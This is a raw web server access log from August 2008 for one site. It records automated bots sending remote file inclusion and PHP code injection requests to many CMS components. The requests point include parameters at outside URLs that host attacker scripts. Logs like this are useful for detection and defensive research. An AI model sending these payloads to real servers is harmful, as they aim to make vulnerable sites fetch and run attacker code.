195.15.2.85 - - [27/Aug/2008:02:51:38 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
84.54.137.9 - - [27/Aug/2008:02:51:43 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
84.54.137.9 - - [27/Aug/2008:02:51:43 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
84.54.137.9 - - [27/Aug/2008:02:51:44 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:52:02 -0700] "GET /logs/access_080724.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:52:17 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:52:20 -0700] "GET //index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:52:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:54:09 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:54:09 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:54:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:56:25 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.254.58.42 - - [27/Aug/2008:02:58:27 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.posmac.nl/templates/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
65.254.58.42 - - [27/Aug/2008:02:58:28 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.posmac.nl/templates/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:23 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:26 -0700] "GET //?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:27 -0700] "GET /logs//?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:28 -0700] "GET //config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:59:32 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:02:59:52 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:02:59:52 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:02:59:52 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:03:00:14 -0700] "GET /logs/access_080717.log//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:03:01:14 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:03:01:14 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:03:01:14 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
205.134.252.10 - - [27/Aug/2008:03:02:21 -0700] "GET /logs/access.log//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.134.252.10 - - [27/Aug/2008:03:02:21 -0700] "GET //index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.134.252.10 - - [27/Aug/2008:03:02:21 -0700] "GET /logs//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:02:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:02:58 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:02:59 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:03:03:15 -0700] "GET /logs/access_080722.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tomromeo.com/chitoz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
66.172.9.3 - - [27/Aug/2008:03:04:04 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
66.172.9.3 - - [27/Aug/2008:03:04:06 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
66.172.9.3 - - [27/Aug/2008:03:04:07 -0700] "GET //components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
209.113.237.92 - - [27/Aug/2008:03:04:29 -0700] "GET /logs/access.log//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.danjtams.com"
209.113.237.92 - - [27/Aug/2008:03:04:29 -0700] "GET //index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.danjtams.com"
209.113.237.92 - - [27/Aug/2008:03:04:29 -0700] "GET /logs//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:05:31 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:05:31 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:05:31 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
86.109.104.39 - - [27/Aug/2008:03:05:52 -0700] "GET /logs/access.log//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
86.109.104.39 - - [27/Aug/2008:03:05:52 -0700] "GET //index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
86.109.104.39 - - [27/Aug/2008:03:05:53 -0700] "GET /logs//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:03:06:21 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:03:06:23 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
74.124.198.61 - - [27/Aug/2008:03:06:23 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
74.124.198.61 - - [27/Aug/2008:03:06:23 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
74.124.198.61 - - [27/Aug/2008:03:06:23 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:03:06:24 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:03:07:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:03:07:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:03:07:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:07:56 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:08:02 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:08:09 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:08:27 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:08:46 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:10:25 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:10:25 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:10:26 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:03:10:34 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:26 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:27 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:27 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:27 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:28 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:11:28 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
89.248.101.69 - - [27/Aug/2008:03:11:30 -0700] "GET /logs/access.log//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
89.248.101.69 - - [27/Aug/2008:03:11:30 -0700] "GET //index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
89.248.101.69 - - [27/Aug/2008:03:11:30 -0700] "GET /logs//index.php?option=com_simpleboard&task=&Itemid=&mosConfig_absolute_path=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:11:42 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:11:43 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:11:43 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:12:20 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:03:12:24 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:12:25 -0700] "GET //admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:03:12:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:12:26 -0700] "GET /logs//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:03:12:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:13:24 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:13:28 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:13:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:15:06 -0700] "GET /logs/scripts.log//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
66.172.9.3 - - [27/Aug/2008:03:16:24 -0700] "GET /logs/access_080717.log//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:03:17:38 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:03:17:38 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:03:17:38 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:18:15 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:18:15 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:18:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:24 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:24 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:25 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:41 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:41 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:41 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:55 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:56 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:18:57 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:20:55 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
212.42.42.42 - - [27/Aug/2008:03:21:48 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
212.42.42.42 - - [27/Aug/2008:03:21:48 -0700] "GET //?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.danjtams.com"
212.42.42.42 - - [27/Aug/2008:03:21:49 -0700] "GET /logs//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:21:51 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:21:52 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:21:52 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:21:57 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:22:01 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:22:04 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:22:04 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:22:04 -0700] "GET /logs//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
